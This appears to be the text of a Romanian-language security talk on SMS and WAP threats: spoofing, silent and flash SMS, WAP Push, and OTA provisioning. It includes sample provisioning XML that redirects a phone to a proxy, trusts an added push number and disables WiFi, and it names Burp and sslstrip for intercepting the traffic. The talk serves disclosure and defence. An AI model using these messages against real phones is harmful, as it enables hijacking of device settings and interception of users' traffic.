  • 3. Informatii generale SMS - Short Message Service reprezinta un mod de comunicare prin mesaje text intre telefoanele mobile / fixe, utilizand un protocol standardizat. Este un mod de comunicare eficace; utilizatorul scrie un text, apasa SEND si mesajul e livrat aproape instant catre destinatar. Folosit pentru mai multe scopuri: MMS – Multimedia Messaging Service, OTA – Over The Air – configurarea telefonului, notificari pentru mesageria vocala, email, fax, microplati – plata unor sume mici pentru diferite servicii => SECURITATE!
  • 4. Informatii generale “Un dispozitiv mobil activ trebuie sa fie capabil de a primi un mesaj scurt de tipul TPDU - Transfer protocol data unit - (SMS-DELIVER) in orice moment, indiferent daca exista un apel sau trafic de date in derulare. Un raport va fi trimis intotdeauna catre SC (Serviciul de mesaje); confirmand fie ca tel a primit mesajul sau ca mesajul nu a fost livrat, incluzind si motivul refuzului.” ETSI TS 100 901 V7.5.0 (2001-12), pag 13
  • 5. Amenintari - SMS SMS SPAM SMS spoofing Notificari SMS Alte tipuri
  • 6. Amenintari - SMS SMS SPAM Companiile ofera servicii de publicitate prin SMS Mesaje cu castiguri false Inginerie sociala – “Suna-ma urgent pe nr asta: 0900323421! Mama”
  • 7. Amenintari - SMS SMS Spoofing Servicii online ce permit modificarea expeditorului (numeric / alfanumeric) Greu de oprit, mai ales daca tinem cont de roaming Eficienta mai mare in atacurile de tip inginerie sociala
  • 8. Amenintari - SMS Notificari SMS Voicemail Fax E-mail Video Utilizatorul nu poate scoate icon-ul de notificare asupra primirii unui astfel de mesaj
  • 9. Amenintari - SMS Notificari SMS (voicemail)
  • 11. Amenintari - SMS Alte tipuri Flash SMS (Class 0) – utilizatorul vede mesajul direct, fara a intra in Inbox Silent SMS – DCS 0xC0 = Message Waiting Indication Group: Discard Message
  • 12. Amenintari - SMS Alte tipuri Flash SMS
  • 13. Amenintari - SMS Alte tipuri Silent SMS
  • 14. WAP Wireless Application Protocol Arhitectura de retea specifica Set de reguli Limbaj specific: Wireless Markup Language (WML) Pagini HTML ajustate pentru dimensiunea ecranului telefonului
  • 15. WAP
  • 16. WAP Push Permite trimiterea de continut WAP cu o interventie minima din partea utilizatorului 2 tipuri: Service Indication / Service Load
  • 17. WAP Push Service Indication (SI) permite trimiterea de notificari utilizatorului intr-un mod asincron
  • 19. WAP Push Service Load (SL) determina “aplicatia” de pe telefon sa incarce si execute un serviciu
  • 21. WAP Push - securitate Teoria: Doar un anumit numar este autorizat pentru trimitere; Practica: daca nu e configurat bine, un telefon accepta de la orice numar astfel de mesaje Pe Windows Mobile trebuiesc verificate setarile din HKLMSecurityPoliciesPolicies ; SL Message Policy ; (default: SECROLE_PPG_TRUSTED) [HKEY_LOCAL_MACHINESecurityPoliciesPolicies] "0000100c"=dword:800 ; SI Message Policy ; (default: SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED) [HKEY_LOCAL_MACHINESecurityPoliciesPolicies] "0000100d"=dword:c00
  • 22. WAP Push - securitate SECROLE_PPG_TRUSTED: Trusted Push Proxy Gateway. Messages assigned this role indicate that the content sent by the Push Initiator is trusted by the Push Proxy Gateway. This role implies that the device trusts the Push Proxy Gateway (SECROLE_TRUSTED_PPG). SECROLE_PPG_AUTH: Push Initiator Authenticated. Messages assigned this role indicate that the Push Initiator is authenticated by the Push Proxy Gateway. This role implies that the device trusts the Push Proxy Gateway (SECROLE_TRUSTED_PPG).
  • 23. WAP Push - securitate
  • 24. WAP Configurarea telefonului pentru acces la Internet / date poate fi facuta manual Pentru o configurare mai usoara, rapida si pentru eventualele schimbari, a fost creat un standard ce permite configurarea de la distanta Programarea Over The Air (OTA) foloseste standardul OMA – Open Mobile Alliance Programarea se face prin SMS-uri special concepute
  • 25. WAP - provisioning Foloseste protocolul WAP WBXML (WAP Binary XML) prin Wireless Application Environment Wireless Session Protocol Wireless Datagram Protocol SMS
  • 26. WAP - provisioning Configurarea se scrie in XML (conform specificatiilor de la http://www.openmobilealliance.org) XML-ul se va codifica in WAP Binary XML WBXML se va encapsula intr-o data de tip Wireless Session Protocol Datele se vor codifica intr-un mesaj Push, definit in Wireless Session Protocol
  • 27. WAP - provisioning Mesajul Push contine diferiti parametri, unul fiind parametrul “SEC” pentru autentificare pe baza de “cheie” comuna USERPIN: string ASCII codificat in zecimale NETWPIN: cheia este specifica retelei si cunoscuta (teoretic) doar de catre operator USERNETWPIN: combinatie a celor 2
  • 28. WAP - provisioning NETWPIN: IMSI = MCC+MNC+MSIN (Mobile Subscription Identification Number) Pret: 2-5 euro-centi In general limitat pentru companii, se cere un volum mare de interogari
  • 29. WAP - provisioning <wap-provisioningdoc> <characteristic type="NAPDEF"> <parm name="NAME" value="NewAPN"/> <parm name="NAPID" value="NewAPN_NAPID_ME"/> <parm name="BEARER" value="GSM-GPRS"/> <parm name="NAP-ADDRESS" value="apn.operator.ro"/> <parm name="NAP-ADDRTYPE" value="APN"/> </characteristic> <characteristic type=“APPLICATION"> <parm name="NAME" value="NewAPN"/> <parm name="APPID" value="w2"/> <parm name="TO-NAPID" value="NewAPN_NAPID_ME"/> </characteristic> <wap-provisioningdoc>
  • 30. WAP - provisioning <wap-provisioningdoc> - contine toata informatia transmisa <characteristic …> - grupeaza informatia in unitati logice <… value="NAPDEF"/> - configuram un nou network access point <parm name="APPID" value="w2"/> - mapeaza configuratia la activitatile de browsing Informatii la http://www.openmobilealliance.org
  • 31. WAP - provisioning <wap-provisioningdoc> <characteristic type="BOOTSTRAP"> <parm name="NAME" value=“Operator NET"/> <parm name="PROXY-ID" value="OpNET_Proxy"/> </characteristic> <characteristic type="NAPDEF"> <parm name="NAME" value="OpNET"/> <parm name="NAPID" value="OpNET_NAPID"/> <parm name="BEARER" value="GSM-GPRS"/> <parm name="NAP-ADDRESS" value="net"/> <parm name="NAP-ADDRTYPE" value="APN"/> </characteristic>
  • 32. WAP - provisioning <characteristic type="PXLOGICAL"> <parm name="NAME" value="OpNET"/> <parm name="PROXY-ID" value="OpNET_Proxy"/> <characteristic type="PXPHYSICAL"> <parm name="PHYSICAL-PROXY-ID" value="OpNET_PhProxy"/> <parm name="PXADDR" value=“192.168.1.1"/> <parm name="PXADDRTYPE" value="IPV4"/> <parm name="TO-NAPID" value="OpNET_NAPID"/> <characteristic type="PORT"> <parm name="PORTNBR" value="8080"/> </characteristic> </characteristic> </characteristic>
  • 33. WAP - provisioning <characteristic type="APPLICATION"> <parm name="APPID" value="w2"/> <parm name="NAME" value="OpNET"/> <parm name="TO-PROXY" value="OpNET_Proxy"/> <characteristic type="RESOURCE"> <parm name="NAME" value="OpNET"/> <parm name="URI" value="http://www.google.com"/> <parm name="STARTPAGE"/> </characteristic> </characteristic> </wap-provisioningdoc>
  • 34. WAP - provisioning Teoretic aceasta configurare poate fi facuta doar de catre operator, de la un numar predefinit Putem analiza SMS-ul prin WireShark Putem adauga un alt numar
  • 35. WAP - provisioning <?xml version="1.0"?> <!DOCTYPE wap-provisioningdoc PUBLIC "-//WAPFORUM//DTD PROV 1.0//EN" wap- "- "http://www.wapforum.org/DTD/prov.dtd"> "http://www.wapforum.org/DTD/prov.dtd"> <wap-provisioningdoc version="1.1"> wap- <characteristic type="BOOTSTRAP"> <parm name="NAME" value=“Nume"/> value=“ Nume"/> </characteristic> <characteristic type="PXLOGICAL"> <parm name="NAME" value=“Nume"/> value=“ Nume"/> <parm name="PROXY-ID" value="Trusted_Proxy"/> name="PROXY- value="Trusted_Proxy"/> <parm name="NAME" value="Trusted Proxy"/> <characteristic type="PXPHYSICAL"> <parm name="PHYSICAL-PROXY-ID" value="Trusted_PhProxy"/> name="PHYSICAL- PROXY- value="Trusted_PhProxy"/> <parm name="PXADDR" value="40711111111"/> <parm name="PXADDRTYPE" value="E164"/> <parm name="TO-NAPID" value="Trusted_NAPID"/> name="TO- value="Trusted_NAPID"/> <parm name="PUSHENABLED" value="1"/> <parm name="PULLENABLED" value="1"/> </characteristic> </characteristic> <characteristic type="NAPDEF"> <parm name="NAME" value="Op"/> <parm name="NAPID" value="Trusted_NAPID"/> value="Trusted_NAPID"/> <parm name="BEARER" value="GSM-SMS"/> value="GSM- <parm name="NAME" value="Trusted Proxy"/> <parm name="NAP-ADDRESS" value=" 40711111111 "/> name="NAP- <parm name="NAP-ADDRTYPE" value="E164"/> name="NAP- </characteristic>
  • 36. WAP - provisioning <wap-provisioningdoc> <characteristic type="NetworkPolicy"> <characteristic type="WiFi"> <characteristic type="Settings"> <parm name="Disabled" value="1"/> </characteristic> </characteristic> </characteristic> </wap-provisioningdoc>
  • 37. Interceptare trafic Traficul trece prin proxy-ul nostru Varianta 1 – Burp Proxy
  • 38. Interceptare trafic Traficul trece prin proxy-ul nostru Varianta 2 – sslstrip http://www.thoughtcrime.org/software/sslstrip/
  • 40. Protectie Operatorul poate filtra aceste tipuri de mesaje Producatorii de telefoane trebuie sa se concentreze mai mult pe securitate Verificati constant (la fel cum faceti cu factura / creditul disponibil) setarile de Internet